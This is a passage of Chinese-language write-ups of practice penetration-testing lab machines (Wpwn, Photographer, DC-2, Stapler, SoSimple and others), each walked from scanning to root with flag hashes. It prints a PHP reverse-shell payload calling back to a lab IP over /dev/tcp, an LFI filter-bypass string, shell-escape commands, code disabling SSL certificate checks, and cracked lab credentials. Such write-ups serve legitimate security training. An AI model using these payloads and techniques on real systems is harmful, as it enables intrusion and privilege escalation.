PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin` ![](https://i.imgur.com/tiGPC1o.png) ![](https://i.imgur.com/VGtobzV.png) 最後把清單上的exploit都戳過 但都爛掉 最後找到一個另一版的linux exploit suggester 翻到一堆exploit https://github.com/mzet-/linux-exploit-suggester ![](https://i.imgur.com/Ez2jGtU.png) ![](https://i.imgur.com/bZFSAvb.png) 最後用了dirtycow 2的ext-url exploit 編譯以後執行就成功root了 ![](https://i.imgur.com/yqEXgMQ.png) ![](https://i.imgur.com/VN1IBok.png) #### Proof local.txt `569a509bad162e12796cc5d58b4deffd` ![](https://i.imgur.com/vFlQnuC.png) proof.txt `137a048a9cb1e0d72e7087ad6ef54e31` ![](https://i.imgur.com/c8CVGDM.png) ----- ### Wpwn 初始掃描開22跟80 感覺80能打 ![](https://i.imgur.com/GcTEVfD.png) 根目錄什麼東西都沒有 掃一下能發現有wordpress ![](https://i.imgur.com/eLQD3oz.png) ![](https://i.imgur.com/T9qTBv4.png) 直接上wpscan 找到一個plugin是不常見的 用searchsploit找可以發現有RCE的漏洞 ![](https://i.imgur.com/1fxO5NS.png) ![](https://i.imgur.com/9dkpgH9.png) 在看了exploit的說明跟原始碼感覺不是很理解 到他的Github上看可以發現payload.txt要用他的格式才能做Command Execution ![](https://i.imgur.com/iowym4g.png) ![](https://i.imgur.com/xTMgamH.png) 直接把這一串塞到meow.txt裡面 然後開一個http server後執行exploit 就能直接RCE了 ``` <pre>system("bash -c 'bash -i >& /dev/tcp/192.168.49.207/443 0>&1'")</pre> ``` ![](https://i.imgur.com/OAUc6aC.png) #### 橫向提權 跑linPEAS找到一個奇怪的密碼 直接`su takis` 發現成功提到takis ![](https://i.imgur.com/kZkq7Mw.png) ![](https://i.imgur.com/daco0n4.png) #### 垂直提權 提到takis以後`sudo -l` 結果發現是ALL 直接`sudo su`就是root了 ![](https://i.imgur.com/oZIjeBt.png) #### Proof local.txt `2e74dca60755cc6512f2ff21aa13f3d8` ![](https://i.imgur.com/9x4u9OW.png) proof.txt `67700d1daeab233daaffd38a88b22db0` ![](https://i.imgur.com/EDiUYe1.png) ----- ### Photographer 感覺兔子洞有點多 ![](https://i.imgur.com/B5wQVTJ.png) Samba裡面有兩個檔案 mailsent.txt裡面可以看到應該有一個user叫Daisa 另一個是wordpress的備份 ![](https://i.imgur.com/yeddwiZ.png) ![](https://i.imgur.com/Lb1HU2K.png) ![](https://i.imgur.com/72cvqOg.png) 對8000掃下去以後發現幾個可疑的目錄 連上admin後發現是Koken CMS 0.22.24 拿searchsploit找可以翻到一個Authenticated的exploit ![](https://i.imgur.com/cTQ86ls.png) ![](https://i.imgur.com/LHSlVKC.png) ![](https://i.imgur.com/wsmK99v.png) 到這邊就完全卡住了 雖然知道email那邊應該是需要填剛剛在mailsent.txt裡面的東西 但密碼完全沒有想法 最後查了Write up才發現原來是在最後一行 Don't forget your secret, my "babygirl" ;) 哭阿== ![](https://i.imgur.com/fsAxeoq.png) 拿到憑證以後就能登入了`daisa@photographer.com:babygirl` ![](https://i.imgur.com/wdf2fff.png) 接下來照著exploit上面的做 點右下角的Import content 接著把剛做好的rev.pgp.jpg上傳並用Burp攔截下來 最後把.jpg刪掉再送出就成功Bypass限制了 ![](https://i.imgur.com/4bhqsuG.png) ![](https://i.imgur.com/lIDfmpL.png) ![](https://i.imgur.com/UgiVE8f.png) ![](https://i.imgur.com/YGdC7Gl.png) ![](https://i.imgur.com/Mj7frex.png) 上傳以後在右邊的欄位往下拉可以看到一個連結 連上去以後就shell了 ![](https://i.imgur.com/t7kkeGv.png) ![](https://i.imgur.com/h6aywt0.png) #### 垂直提權 跑linPEAS 發現有php 查了一下GTFOBins能找到一個SUID base的提權 打完就root了 ![](https://i.imgur.com/iO90kYW.png) ![](https://i.imgur.com/LGZOKiW.png) ![](https://i.imgur.com/BHY86mm.png) #### Proof local.txt `b5133a1a54c468f1436bd780bfdd15ab` ![](https://i.imgur.com/iGPdynx.png) proof.txt `47fee6bf7ecb4342919c3bc88f0c7f75` ![](https://i.imgur.com/JZSgPmY.png) ----- ### DC-2 感覺這Port開的有點奇怪 ![](https://i.imgur.com/OOwcJaj.png) 原來7744是SSH ![](https://i.imgur.com/uDiPlNc.png) 連上80的時候網址會自動轉譯成dc-2 改一下hosts ![](https://i.imgur.com/9d3rSas.png) ![](https://i.imgur.com/c9aVeqh.png) 掃路徑會發現是wordpress ![](https://i.imgur.com/QskXVOK.png) 上wpscan可以找到3個user ![](https://i.imgur.com/vPfABsH.png) 在Flag可以看到他有提示我們使用cewl來產一個wordlist出來 順便也把user放進去另一個wordlist ![](https://i.imgur.com/MArjgfm.png) ![](https://i.imgur.com/QlmOnEP.png) 拿這兩個wordlist去炸就能拿到憑證了 ![](https://i.imgur.com/gbwvJUx.png) 但這兩個帳號說實話都沒什麼用 所以嘗試直接SSH上去 發現tom可以`tom:parturient` ![](https://i.imgur.com/JglCgRr.png) #### 逃脫shell 順利連上 但shell是受限的 不過發現可以用vi 照著下面打就能生一個正常的shell出來了 ``` :set shell=/bin/bash :shell ``` ![](https://i.imgur.com/eHC5fCI.png) ![](https://i.imgur.com/I8ly9NT.png) ![](https://i.imgur.com/nYXKNQ4.png) #### 橫向提權 直接`su jerry` 然後把剛剛的密碼拿過來用 發現可以`jerry:adipiscing` ![](https://i.imgur.com/1ncKfYc.png) #### 垂直提權 `sudo -l`發現可以用git 跑去GTFOBins可以翻到一個生shell的指令 ![](https://i.imgur.com/z5d98dM.png) ![](https://i.imgur.com/EG6rSWh.png) ![](https://i.imgur.com/7G5sEYP.png) #### Proof local.txt `6ca181047e71c062e1012d906f98a5ea` ![](https://i.imgur.com/Y4fz1JD.png) proof.txt `3d9b1c37362a7abd504e6d72a5d65ccc` ![](https://i.imgur.com/Y2iU6Uo.png) ----- ### OnSystemShellDredd 奇怪的開Port ![](https://i.imgur.com/zvO3OGE.png) 這兩個東西我記得都是沒有漏洞的耶:( ![](https://i.imgur.com/rU3tPec.png) FTP上去可以翻到一個id_rsa 給權限600後直接SSH剛剛資料夾的名字就拿到shell了 ![](https://i.imgur.com/z36MdU2.png) ![](https://i.imgur.com/nhLMFLR.png) #### 垂直提權 跑linPEAS 發現有兩個SUID檔案超級可疑 GTFOBins找cpulimit可以翻到一個SUID Base的payload ![](https://i.imgur.com/uOFr1fm.png) ![](https://i.imgur.com/gsUMCzY.png) 打進去就root了 ![](https://i.imgur.com/gnwEEp7.png) #### Proof local.txt `862a3ca31dd61b1533f4752f5f6b6b60` ![](https://i.imgur.com/4GPcWJL.png) proof.txt `d1fe29b5a18f3d1d7e5454f12587f50a` ![](https://i.imgur.com/pla7zHt.png) ----- ### Ha-natraj 打Web ![](https://i.imgur.com/E7litU3.png) 掃路徑可以翻到一個奇怪的東西 ![](https://i.imgur.com/ur4uiB7.png) 進去以後可以看到一個file.php 但進去以後啥鬼都沒 ![](https://i.imgur.com/iGfoPd2.png) ![](https://i.imgur.com/1E3QbWw.png) 這個file.php我懷疑有可能是可以打LFI的 所以我稍微對他掃一下參數 發現確實可以LFI ![](https://i.imgur.com/KoeJboB.png) ![](https://i.imgur.com/W2kOXwC.png) #### 非正規RCE 直接用LFI_2_RCE.py就直接RCE了 ![](https://i.imgur.com/DHm9Gs3.png) #### 正規RCE LFI可以讀到auth.log 可以做Log Posion ![](https://i.imgur.com/3aDLVOZ.png) 用webshell當使用者連上SSH以後斷開 用reverse shell戳auth.log就RCE了 ![](https://i.imgur.com/WoGaruW.png) ![](https://i.imgur.com/c2fh0aY.png) #### 提權 因為正規解的方式是不可能達成的 所以只能用其他方式解 跑linPEAS可以看到sudo的版本是1.8.21p2 ![](https://i.imgur.com/mao6jzY.png) 找這版本的exploit可以翻到一個Github https://github.com/worawit/CVE-2021-3156 用了裡面的exploit_nss.py可以直接拿到root ![](https://i.imgur.com/PJGfvrV.png) #### Proof local.txt `e578cefb0593179dbd279a0b929c4101` ![](https://i.imgur.com/IZeyT8n.png) proof.txt `1ae303e9dfcc9511301871179e01cbdc` ![](https://i.imgur.com/6H3pxNI.png) ----- ### FunboxEasyEnum 有開22跟80 ![](https://i.imgur.com/224Lz7H.png) 掃了一下可以看到有一個叫mini.php的東西看起來超可疑 ![](https://i.imgur.com/TWC93kO.png) 連上去以後發現是webshell ![](https://i.imgur.com/zLJipwV.png) 寫一個reverse shell 然後丟上去 用curl戳一下就RCE了 ![](https://i.imgur.com/ZGZNuku.png) ![](https://i.imgur.com/GRtRAXw.png) ![](https://i.imgur.com/j5dAc9T.png) #### 橫向移動 goat 弱憑證 ![](https://i.imgur.com/ojvRSqA.png) #### 垂直移動 root `sudo -l`發現可以用mysql ![](https://i.imgur.com/h1xzVpU.png) GTFOBins有一個Sudo Base的Payload 用了以後就root了 ![](https://i.imgur.com/phmYy6x.png) ![](https://i.imgur.com/VEeoysz.png) #### 橫向移動 harry `SELECT schema_name FROM information_schema.schemata;` ![](https://i.imgur.com/7oqQtBA.png) `SELECT table_name FROM information_schema.tables WHERE table_schema="db1";` ![](https://i.imgur.com/1ULMlNw.png) `SELECT column_name FROM information_schema.columns WHERE table_name="users";` ![](https://i.imgur.com/6g16dfu.png) `SELECT id,name,passwd FROM db1.users;` ![](https://i.imgur.com/597xIfv.png) ![](https://i.imgur.com/1pU7uLY.png) ![](https://i.imgur.com/9FTnB3e.png) #### 橫向移動 oracle 看passwd裡面好像有一個人有hash ![](https://i.imgur.com/fwUAd0m.png) 拿john炸可以炸出一個憑證 ![](https://i.imgur.com/A3Gk9Yg.png) ![](https://i.imgur.com/coIl4ff.png) #### Proof local.txt `b8c68cd9f4c523c203c9bda2db91dbf2` ![](https://i.imgur.com/fBUmh37.png) proof.txt `72214d27517e1cb20200e012453a6a1b` ![](https://i.imgur.com/PppQjoY.png) ----- ### Solstice 這台的兔子洞很多 細掃發現奇怪的服務都開在很高的Port ![](https://i.imgur.com/V68uDin.png) ![](https://i.imgur.com/jt6jFGE.png) 經過了蠻久的枚舉以後終於在8593發現一個可疑的東西 如果點一下Book List可以發現網頁在index.php的後面加一個參數 我懷疑這個可以做LFI ![](https://i.imgur.com/dO6fUm1.png) 戳了一下`/etc/passwd` 發現確實可以 接著嘗試做Log Poisoning 發現`/var/log/apache2/access.log`可以訪問 ![](https://i.imgur.com/fQJ07Gi.png) ![](https://i.imgur.com/Um9Ykx4.png) 用nc寫一個webshell進去 然後再用curl戳一下就RCE了 ![](https://i.imgur.com/KfIbWA1.png) ![](https://i.imgur.com/IWbXNq3.png) #### 提權 跑linPEAS 可以發現有一個僅限本地訪問的root權限服務跑在`/var/tmp/sv`下 過去看了發現是可以在下面寫入的 隨便寫一個reverse shell戳一下就root了 ![](https://i.imgur.com/Bt4ypWB.png) ![](https://i.imgur.com/Ftyyh0W.png) #### Proof local.txt `ccf7dec92705097cfca016f3fd5a12f4` ![](https://i.imgur.com/bO4JCKN.png) proof.txt `c26bb4a2ef27ce1f4fcecb478a387c69` ![](https://i.imgur.com/umHGrmw.png) ----- ### EvilBox-One 開22 80 ![](https://i.imgur.com/fN3eDFj.png) 直接掃可以掃到`/secret` ![](https://i.imgur.com/V1yIree.png) 對secret掃下去可以看到有一個`evil.php` ![](https://i.imgur.com/l1qCS2c.png) 拿LFI可能參數的wordlist來掃可以看到說裡面有一個叫command的參數可以做到LFI ![](https://i.imgur.com/jqzZKmD.png) /etc/passwd裡面有一個使用者 可以直接戳到`id_rsa` ![](https://i.imgur.com/k5FNmSl.png) `chmod 600`後可以直接連上去 但需要密碼 ![](https://i.imgur.com/ffPxfGc.png) ssh2john就可以直接噴密碼出來了 輸入就能取得Initial Shell ![](https://i.imgur.com/gRNHQHC.png) #### 垂直移動 root 跑linPEAS 發現居然能寫`/etc/passwd` ![](https://i.imgur.com/NWiMlXU.png) 寫入一個帳號就root了 ![](https://i.imgur.com/QiTkFeT.png) #### Proof local.txt `ca146c9b53ecc6185cc3f0547b861e7a` ![](https://i.imgur.com/oPen3gF.png) proof.txt `41ce6ce1a562e8ae311190b370fe7828` ![](https://i.imgur.com/p8KLDdi.png) ----- ### DriftingBlues6 又是 Web ![](https://i.imgur.com/fetK614.png) Apache 版本看起來有點舊 ![](https://i.imgur.com/x0hMZTI.png) 掃了一下路徑發現 `robots` 很可疑 ![](https://i.imgur.com/YMDaRNg.png) 嗯 看來要將 `.zip` 加進後綴ㄌ 不過我原本就有加 所以應該沒差:D ![](https://i.imgur.com/kk6tyud.png) ![](https://i.imgur.com/GVFJRGb.png) ----- ## Intermediate ### Assertion101 打80ㄅ ![](https://i.imgur.com/3lbtjCo.png) ~~非常健康的網站~~ 點一下About us可以發現URL那邊好像能夠LFI ![](https://i.imgur.com/68NsUaN.png) ![](https://i.imgur.com/LSisp3u.png) 但發現會被擋下來 查了一堆繞過的方法後最後在HackTricks裡面翻到一串Payload 上面的描述看起來符合網站的回應 ![](https://i.imgur.com/aThHC6Q.png) ![](https://i.imgur.com/A6hkGni.png) 嘗試了一下裡面的其中一條 發現可以成功LFI `' and die(show_source('/etc/passwd')) or '` ![](https://i.imgur.com/hH5lYmB.png) 在這邊突然想到 既然die是php的function 那有沒有可能直接system 嘗試了一下發現可以 直接在本地做一個reverse shell 然後開HTTP Server 對面用curl戳一下就RCE了 ![](https://i.imgur.com/jcnjK9z.png) ![](https://i.imgur.com/HVQl4HJ.png) #### 提權 跑linPEAS 發現裡面有一個東西長的蠻奇怪的 ![](https://i.imgur.com/XpMVvq8.png) GTFOBins裡面雖然有一個SUID Base的 但這個方案不行 ![](https://i.imgur.com/CbaX6Uf.png) ![](https://i.imgur.com/veRHtRP.png) 之後嘗試上面Command b的方案 看起來像是下載一個檔案![](https://i.imgur.com/fIAobvL.png) 這邊要注意的是gid只能用0-9a-zA-Z的固定長度格式 不能用其他的不然會爛掉 https://github.com/aria2/aria2/issues/1276 ![](https://i.imgur.com/0jcp5yJ.png) 在多次的實驗中 偶然發現了下載的檔案會是以root的權限下載並寫入的 ![](https://i.imgur.com/9NbmYu5.png) 在這邊我有一個想法 直接把對面的`passwd`複製回本地 然後加上一行新的帳號後下載回`/etc`下 加上root1的passwd ![](https://i.imgur.com/DuByfvg.png) 下載完成後`su root1` 酷 我們root了 ![](https://i.imgur.com/JpWnRYK.png) #### Proof local.txt `63db732ef1f32a2a078eeeb47ba382eb` ![](https://i.imgur.com/wJJmASW.png) proof.txt `fd8308fb743e54a31cf1ec4656cf1695` ![](https://i.imgur.com/Mcm0V01.png) ----- ### Y0usef Web題 ![](https://i.imgur.com/W8E4YdH.png) 掃目錄掃到一個奇怪的東西 連上去以後被擋住 感覺很可疑 這個Forbidden沒有Apache的資訊 感覺像是自己加的用來掩飾什麼東西的網頁 ![](https://i.imgur.com/GlDmmWx.png) ![](https://i.imgur.com/sX8vbgF.png) 用X-Forwarded-For Header這個外掛把能加的偽造IP都加上去 重新整理一次就繞過了 到登入頁面後直接猜`admin:admin` 可以直接進到dashboard ![](https://i.imgur.com/1Bi3fi2.png) ![](https://i.imgur.com/1WOKujG.png) ![](https://i.imgur.com/2AB4wU0.png) ![](https://i.imgur.com/jk9sXaF.png) 隨便寫一個Reverse shell丟上去 但被擋下來 拿Burp把封包攔下來以後將Content-Type改成`image/png`後就成功上傳了 ![](https://i.imgur.com/ojNJios.png) ![](https://i.imgur.com/wDTSJEt.png) ![](https://i.imgur.com/JIrcGzC.png) 拿curl戳一下就能shell ![](https://i.imgur.com/1ELAszE.png) #### 橫向移動 yousef 在`/home`下可以發現一個user.txt 打開以後發現是base64過的字 解開以後可以拿到yousef的憑證 ![](https://i.imgur.com/HErnGRz.png) #### 垂直移動 root `sudo -l`看到是ALL 直接`sudo su`就root了 ![](https://i.imgur.com/R2bQaL3.png) #### Proof local.txt `823c9978b7290da38985299e58b942f1` ![](https://i.imgur.com/YOkYTB4.png) proof.txt `bbeccda2bdaefb4406d78a59fd6ce84e` ![](https://i.imgur.com/T7o09KI.png) ----- ### Tre 看起來是要打Web 8082看起來有點可疑 ![](https://i.imgur.com/q8Ibnrn.png) 是Web Server ![](https://i.imgur.com/SjdhIAY.png) 拿dirsearch套big.txt在80枚舉可以翻到幾個目錄 稍微觀察一下以後會發現cms應該只是HTTP模板 沒什麼用 adminer.php好像是一個可以用的東西 但沒有憑證也沒有exploit ![](https://i.imgur.com/5I5viND.png) ![](https://i.imgur.com/PazKywJ.png) ![](https://i.imgur.com/UkhQGwb.png) ![](https://i.imgur.com/oUGGfzt.png) ![](https://i.imgur.com/LL5qvuK.png) 連上`/mantisbt` 是一個CMS 但沒有透漏版本資訊 不過照直覺來看感覺這邊是一個進入點 對著他掃下去可以翻到蠻多東西的 進入`/mantisbt/config`以後可以看到幾個可疑的檔案 ![](https://i.imgur.com/clH0ptp.png) ![](https://i.imgur.com/wNkigU8.png) ![](https://i.imgur.com/WpPIY80.png) 點進a.txt以後可以翻到裡面存著MySQL的憑證 回想起剛剛有找到一個看起來是連MySQL的php 直接回去輸入憑證就能登入了 ![](https://i.imgur.com/yDoXzEs.png) ![](https://i.imgur.com/bOMvR3g.png) SELECT mantis_user_table的話可以看到好像是憑證的東西 嘗試把tre的憑證拿去SSH發現可以登入 `tre:Tr3@123456A!` ![](https://i.imgur.com/begqwHr.png) ![](https://i.imgur.com/W4NXRci.png) #### 提權 `sudo -l`可以發現能關機 ![](https://i.imgur.com/FAwwVce.png) 跑pspy64的時候發現有一個程式在瘋狂執行 ![](https://i.imgur.com/5F0DKwa.png) 打開看不知道是什麼東西 但我們有權限可以寫入 ![](https://i.imgur.com/WYpVYAc.png) 直接寫一個reverse shell進去 但都沒有戳回來 想到剛剛`sudo -l`顯示可以用`shutdown` 那直接重開機看看會不會重新載入這個script ![](https://i.imgur.com/exgOYf5.png) 結果顯示會重新載入 有一個reverse shell噴回來 而且是root權限 ![](https://i.imgur.com/SVnLrD9.png) #### Proof local.txt `3efbede40943253846a09b396a58c90c` ![](https://i.imgur.com/2rZVGSJ.png) proof.txt `5cb5ee64b1365a6ce5698fee8e7eaaf7` ![](https://i.imgur.com/Y87vdzN.png) ----- ### SunsetMidnight 有開MySQL耶 ![](https://i.imgur.com/2JAy23S.png) Web看起來是Wordpress 拿wpscan可以掃到一個user 但看起來沒有可以打的plugin ![](https://i.imgur.com/BzA2xUA.jpg) ![](https://i.imgur.com/IVbkzhS.png) 拿hydra去炸MySQL 發現可以噴出一個憑證`root:robert` ![](https://i.imgur.com/N5QVuDU.png) 連上後找一下wp的帳號 但Hash噴不出來東西 ![](https://i.imgur.com/Koq6RBs.png) ![](https://i.imgur.com/p7UQXAi.png) 突然想到我們的權限應該是root 應該能直接把Hash換成我們自己的 [我用這個網站](https://www.useotools.com/wordpress-password-hash-generator)來產Wordpress專用的Hash ![](https://i.imgur.com/HbTyyZt.png) ![](https://i.imgur.com/iyxfnPa.png) 換掉以後到wp-admin登入`admin:meow` 就能進去Dashboard了 ![](https://i.imgur.com/V8xBCUt.png) 接著到Appearance > Theme Editor改頁面的原始碼 不過原本的Theme會不給改 所以要改成Twenty Nineteen才能修頁面的code ![](https://i.imgur.com/bm8i24R.png) ![](https://i.imgur.com/O75hqMd.png) ![](https://i.imgur.com/0bkaNnp.png) 改完以後用curl戳一下就RCE了 ![](https://i.imgur.com/KzCSM0L.png) #### 提權 跑linPEAS 發現一個奇怪的SUID檔案 ![](https://i.imgur.com/79TXIDJ.png) 對他分析可以發現裡面的service感覺應該是沒有用到絕對路徑 ![](https://i.imgur.com/YEIvAKa.png) ![](https://i.imgur.com/lhDYnew.png) 做Path Hijacking就拿到root了 ![](https://i.imgur.com/3YgMmCL.png) #### Proof local.txt `766bad76b40ca29c7eb63e47baa08941` ![](https://i.imgur.com/7LAP8By.png) proof.txt `51136ddd495fb94951263e258ec15d9b` ![](https://i.imgur.com/yUGSTqd.png) ----- ### Stapler 兔子洞很多 ![](https://i.imgur.com/rrEiFbr.png) 到666可以看到一個感覺像是檔案的東西 載下來以後用file看發現是zip 對他解壓縮可以看到一個message2.jpg 打開看可以發現一個username `scott` ![](https://i.imgur.com/Fb7OU5x.png) ![](https://i.imgur.com/7bvfC9n.png) ![](https://i.imgur.com/DvWyXnq.png) ![](https://i.imgur.com/nSUHYSb.png) 拿exiftool看他會說我應該拿到一個cookie? ![](https://i.imgur.com/AijSj4W.png) 連SMB上去可以發現有兩個share 裡面有一些酷東西可以拿下來 ![](https://i.imgur.com/oaUImFV.png) ![](https://i.imgur.com/V1DXwA5.png) ![](https://i.imgur.com/4e16Oyg.png) 那個Wordpress讓我覺得對面網站運行著WP 但不知道開在哪邊 vsftpd.conf沒什麼能用的東西 todo-list也只拿到一個username `kathy` ![](https://i.imgur.com/HUBIh8y.png) 可惜裡面沒有憑證 ![](https://i.imgur.com/snRJFXP.png) ls根本沒用 ![](https://i.imgur.com/zP4tZgJ.png) 連上FTP 這邊有一個note 但同樣也是沒什麼用的檔案 ![](https://i.imgur.com/CVEmrF3.png) ![](https://i.imgur.com/zFdgHav.png) 掃了一下80 感覺像是某人的home ![](https://i.imgur.com/mor5Kwx.png) 因為上面感覺沒什麼利用價值 感覺都只是兔子洞 所以到最高的12380找線索 在12380的頁面查看原始碼 可以翻到一個username `zoe` ![](https://i.imgur.com/QeZFS6r.png) 在這邊用nikto對著12380開掃 可以發現對面好像有啟用TLS? ![](https://i.imgur.com/wyTu2fl.png) 用SSL連上以後終於看得到其他東西了 掃了一下目錄 可以看到有其他路徑噴出來 ![](https://i.imgur.com/QdXSZgn.png) ![](https://i.imgur.com/BHxzhRf.png) robots.txt上有兩個路徑 一個看起來是被BeEF感染過的 另一個看起來是一個wordpress ![](https://i.imgur.com/YMEjFnQ.png) ![](https://i.imgur.com/u2NHJSL.png) ![](https://i.imgur.com/alil7Ow.png) 拿wpscan可以翻出好幾個plugin 其中這個plugin可以翻到一個LFI的exploit ![](https://i.imgur.com/xZvRZnX.png) ![](https://i.imgur.com/RL8NtH1.png) 更改exploit裡面的URL以後就能用了 但發現用的時候會直接爛掉 ![](https://i.imgur.com/7s3r0Iw.png) ![](https://i.imgur.com/LOqcsQJ.png) 之後在[這篇文](https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error)翻到了解決辦法 加兩行進去就可以直接繞過這個限制了 ```python= import ssl ssl._create_default_https_context = ssl._create_unverified_context ``` ![](https://i.imgur.com/16Vxs9k.png) 但運行以後都沒反應(? 回去看WP的頁面多出了幾個POST 這代表exploit應該是成功的 ![](https://i.imgur.com/18bvsHR.png) ![](https://i.imgur.com/HshPBOh.png) POST也沒東西 ![](https://i.imgur.com/VOw8eKL.png) 之後又找了一下exploit 找到一個新的 https://github.com/gtech/39646 設定好`url`跟`file_path`以後執行 可以成功戳到`wp-config.php` ![](https://i.imgur.com/EKHQVhu.png) ![](https://i.imgur.com/ljtF26z.png) 整理以後可以變成下面的樣子 可以看到這邊有DB的憑證 ```php= <?php define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'plbkac'); /** MySQL hostname */ define('DB_HOST', 'localhost'); ``` 可以拿憑證登入MySQL `root:plbkac` ![](https://i.imgur.com/F3ZFUcc.png) 翻DB ![](https://i.imgur.com/T1IGUAV.png) loot感覺蠻可疑的 找一下可以翻到一個憑證 ![](https://i.imgur.com/u1vBqlV.png) ![](https://i.imgur.com/qhLGb7j.png) ![](https://i.imgur.com/7eWOGbe.png) 密碼是12345 但幾乎每個地方都不能用mike登入 這是兔子洞 ![](https://i.imgur.com/ZKEWzKG.png) ![](https://i.imgur.com/5Sg656q.png) proof這個db也沒用 ![](https://i.imgur.com/NgWZ9aC.png) 嘗試寫一個webshell在`/var/www/html`下 但發現沒有這個路徑?? ![](https://i.imgur.com/UqHMe4z.png) 之後[爬了一下文](https://www.tutorialspoint.com/how-to-change-apache-default-web-root-folder-to-a-new-location-on-ubuntu-16-04) 發現如果要知道網站的根目錄可以看`000-default.conf`這個檔案 把exploit改成LFI這個檔案後執行 整理以後可以發現根目錄是在`/var/www/https` ![](https://i.imgur.com/znlXVDT.png) ```htmlembedded <IfModule mod_ssl.c> <VirtualHost _default_:12380> ServerAdmin garry@red DocumentRoot /var/www/https ``` 但根本沒有權限寫入 ![](https://i.imgur.com/Iboq0ep.png) 直接翻wordpress的user 然後把hash都抓下來用hashcat炸 ![](https://i.imgur.com/Mm2BwCR.png) 等了一段時間後收集到了這些憑證 ``` john:incorrect elly:ylle barry:washere heather:passphrase garry:football harry:monkey scott:cookie kathy:coolgirl tim:thumb dave:damachine pam:0520 ``` 用john登入以後發現他好像是admin 但不能修網站原碼 ![](https://i.imgur.com/75wPIE9.png) ![](https://i.imgur.com/OWmGoxt.png) 嘗試上傳plugin 但在安裝的時候發現會卡驗證 ![](https://i.imgur.com/tT7vxs3.png) ![](https://i.imgur.com/eGeJ28X.png) 嘗試直接上傳php 然後到`/wp-content/uploads` 發現他會先存在這邊 ![](https://i.imgur.com/MelY8yR.png) 拿curl戳 終於RCE了 ![](https://i.imgur.com/ICHDfyc.png) #### 橫向移動 Shayslett 帳密一樣 直接su就可以了 `SHayslett:SHayslett` ![](https://i.imgur.com/d4Kji2O.png) #### 橫向移動 JKanode 跑linPEAS可以發現這邊有可疑的帳密 ![](https://i.imgur.com/vxHfnDy.png) `JKanode:thisimypassword` ![](https://i.imgur.com/7mokFM4.png) #### 橫向移動 peter 跑linPEAS可以發現這邊有可疑的帳密 ![](https://i.imgur.com/vxHfnDy.png) `peter:JZQuyIN5` ![](https://i.imgur.com/LkFGmCa.png) #### 垂直移動 root Sudo Base 在peter的帳號內`sudo -l`發現是ALL ![](https://i.imgur.com/fylZ0wR.png) #### 垂直移動 root Cronjob Base 跑linPEAS 發現這個東西 因為他叫cron 所以我懷疑他在跑Cronjob ![](https://i.imgur.com/32SJtRf.png) 直接把一個reverse shell塞進去 等一段時間就看到reverse shell回來了 ![](https://i.imgur.com/kAQihQG.png) #### 非正規解 第一次打的時候直接用metasploit打SMB 結果一不小心就直接打到root了QQ ![](https://i.imgur.com/NT8CuwF.png) ![](https://i.imgur.com/bwxJTmw.png) #### Proof local.txt `ffb5729c95cb103a59ab89f2eb943709` ![](https://i.imgur.com/pNn1oxL.png) proof.txt `b4a046c4186c4d6ea1ecda4ecd54b683` ![](https://i.imgur.com/IVq4uVO.png) ----- ### SoSimple 看起來要打Web ![](https://i.imgur.com/SUE25B5.png) 感覺有開wordpress `mybackup.txt`不知道是什麼東西 ![](https://i.imgur.com/Dmutppb.png) ![](https://i.imgur.com/qrfa3mj.png) 拿wpscan掃wordpress 可以翻到一個plugin 看起來是有exploit的 ![](https://i.imgur.com/6Q5MkMh.png) ![](https://i.imgur.com/6iMhO1J.png) 根據他Github上的介紹 payload要按照他的格式才能運作 感覺之前好像打過類似的(? ![](https://i.imgur.com/Uc9a7on.png) 寫一個reverse shell 運行以後就RCE了 ![](https://i.imgur.com/uy62Twt.png) #### 橫向移動 max `wp-config.php`裡面有一個可以連MySQL的憑證 連上以後查DB有沒有東西 有拿到兩個人的憑證 有一個人叫max 感覺有可能是他的密碼 ![](https://i.imgur.com/7YyLkhF.png) ![](https://i.imgur.com/aa93TR1.png) 拿hashcat可以炸密碼出來 但不能登入 ![](https://i.imgur.com/49drhrT.png) ![](https://i.imgur.com/4rChZiV.png) 之後跑到他的home下翻到一個`id_rsa` 複製回來後加600權限連上去就是max了 ![](https://i.imgur.com/knx87T0.png) ![](https://i.imgur.com/p1g3MBx.png) #### 橫向移動 steven `sudo -l`發現可以用service 查了GTFOBins發現一個Sudo Base的 照著上面做就能生shell了 ![](https://i.imgur.com/QfXVkCy.png) ![](https://i.imgur.com/0j3VhRt.png) #### 垂直移動 root `sudo -l`發現可以用root身分運行某sh 本來想說打開看是什麼東西 但那東西並不存在 所以過去創建一個符合條件的sh 執行以後就root了 ![](https://i.imgur.com/R2OqFi0.png) #### Proof local.txt `b8d730135afa51d6bf3ded1de0e2c57d` ![](https://i.imgur.com/1YYL5Kv.png) proof.txt `ae178437a97333e688a6a6ea04448569` ![](https://i.imgur.com/n64VRnz.png) ----- ### HAWordy 打Web ![](https://i.imgur.com/LZ2VISc.png) 掃一下路徑以後可以翻出一些酷東西 `notes.txt`中有提到zip 感覺有點可疑 把後綴加上`.zip`以後重掃一次 發現一個`secret.zip` ![](https://i.imgur.com/8QfyNjB.png) ![](https://i.imgur.com/bfdDDRC.png) ![](https://i.imgur.com/24cakvM.png) 載下來 但發現需要密碼 拿zip2john提取hash出來以後還是爆不出來 這東西可能只是兔子洞 ![](https://i.imgur.com/z936VRB.png) ![](https://i.imgur.com/pJoCRDP.png) wpscan的結果出來了 有一個plugin看起來是有exploit的 ![](https://i.imgur.com/TFX6Qmk.png) ![](https://i.imgur.com/Wn42AYz.png) 按照上面的描述這串URL好像就可以直接達成RFI ![](https://i.imgur.com/VcjLAMo.png) 用curl戳 發現他要的是`wp-load.php` 把名字改成`wp-load.php`以後就能RCE了 ![](https://i.imgur.com/sEBuKUO.png) #### 提權 跑linPEAS 發現`cp`有SUID權限 ![](https://i.imgur.com/jRlmaSx.png) 把`passwd`加上一行自己的帳號再複製回去 `su`以後就是root了 ![](https://i.imgur.com/YpWQMpj.png) #### Proof local.txt `8e2f176d0936f83b5aca387b087ec275` ![](https://i.imgur.com/55GSgS6.png) proof.txt `95f5ab7b2c98ea075d6f5df273778904` ![](https://i.imgur.com/8X4ruWL.png) ----- ### Loly 只開80 ![](https://i.imgur.com/hL9qsJ9.png) 掃路徑可以看到有一個wordpress 應該是開wp的網站 ![](https://i.imgur.com/UD1iEr1.png) 拿wpscan可以掃到一個user 拿去爆破可以噴出密碼 ![](https://i.imgur.com/8yYve34.png) 